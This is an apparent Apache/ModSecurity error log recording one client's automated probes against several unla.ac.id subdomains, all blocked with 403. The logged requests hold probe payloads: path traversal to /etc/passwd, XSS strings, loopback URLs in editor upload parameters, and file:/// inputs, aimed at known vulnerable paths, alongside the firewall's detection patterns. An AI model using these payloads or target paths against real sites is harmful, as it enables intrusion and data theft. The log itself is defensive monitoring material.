[Tue Aug 29 11:56:46.925118 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:231591/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAApbUzsAAAAh"]
[Tue Aug 29 11:56:47.537518 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16j8Co-f0AAAocyoQAAAAR"]
[Tue Aug 29 11:56:47.540354 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAq-HgMAAAAT"]
[Tue Aug 29 11:56:47.543855 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAApbUz4AAAAh"]
[Tue Aug 29 11:56:47.548277 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAArIAZgAAAAX"]
[Tue Aug 29 11:56:47.552132 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAArZP1oAAAAC"]
[Tue Aug 29 11:56:47.605684 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAolK6kAAAAe"]
[Tue Aug 29 11:56:47.606385 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:528109/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16j8Co-f0AAAq5@WAAAAAK"]
[Tue Aug 29 11:56:47.609680 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAArIAZkAAAAX"]
[Tue Aug 29 11:56:47.609809 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAq-HgQAAAAT"]
[Tue Aug 29 11:56:47.620316 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAApbU0AAAAAh"]
[Tue Aug 29 11:56:47.628553 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAoz8OYAAAAS"]
[Tue Aug 29 11:56:47.628766 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAocyocAAAAR"]
[Tue Aug 29 11:56:48.571303 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAoz8OkAAAAS"]
[Tue Aug 29 11:56:48.594764 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAArZP2AAAAAC"]
[Tue Aug 29 11:56:48.594804 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:at: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAqsWB8AAAAB"]
[Tue Aug 29 11:56:48.645361 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:at: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAq-HgoAAAAT"]
[Tue Aug 29 11:56:48.672525 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAq-HgsAAAAT"]
[Tue Aug 29 11:56:48.679529 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAArIAaAAAAAX"]
[Tue Aug 29 11:56:48.698057 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:at: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAocyo4AAAAR"]
[Tue Aug 29 11:56:48.699520 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAArIAaEAAAAX"]
[Tue Aug 29 11:56:48.715378 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAqqtlcAAAAA"]
[Tue Aug 29 11:56:48.722151 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:015383/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16kMCo-f0AAAocyo8AAAAR"]
[Tue Aug 29 11:56:48.736315 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16kMCo-f0AAAqqtlgAAAAA"]
[Tue Aug 29 11:56:48.743574 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16kMCo-f0AAAocypAAAAAR"]
[Tue Aug 29 11:56:48.796623 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAArIAaUAAAAX"]
[Tue Aug 29 11:56:49.526960 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16kcCo-f0AAAqsWCUAAAAB"]
[Tue Aug 29 11:56:49.601452 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16kcCo-f0AAAq@sokAAAAM"]
